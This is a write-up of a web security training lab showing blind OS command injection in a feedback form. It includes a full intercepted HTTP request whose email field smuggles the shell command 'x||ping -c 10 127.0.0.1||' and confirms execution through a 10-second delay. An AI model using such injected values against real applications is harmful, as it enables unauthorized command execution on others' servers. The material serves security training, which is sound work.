Blind OS command injection with time delays

Description

This lab contains a blind OS command injection vulnerability in the feedback function. The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

Reproduction and proof of concept

  1. Use Burp Suite to intercept and modify the request that submits feedback.

  2. Modify the email parameter, changing it to: email=x||ping+-c+10+127.0.0.1||

POST /feedback/submit HTTP/1.1
Host: 0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net
Cookie: session=PBI3JYi8xuN2EDvHhrWZseFHddKXZkn3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 162
Origin: https://0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net
Referer: https://0ab00001046ddc1bc07b1d4b00f600f4.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

csrf=WyBp0kTPSNblM4Z6OFjvREdg9Eo7FyIf&name=Test&email=x||ping+-c+10+127.0.0.1||&subject=Love+it&message=Much+appreciated.

  1. Observe that the response takes 10 seconds to return.

Exploitability

An attacker will need to exploit the blind OS command injection vulnerability to cause a 10 second delay.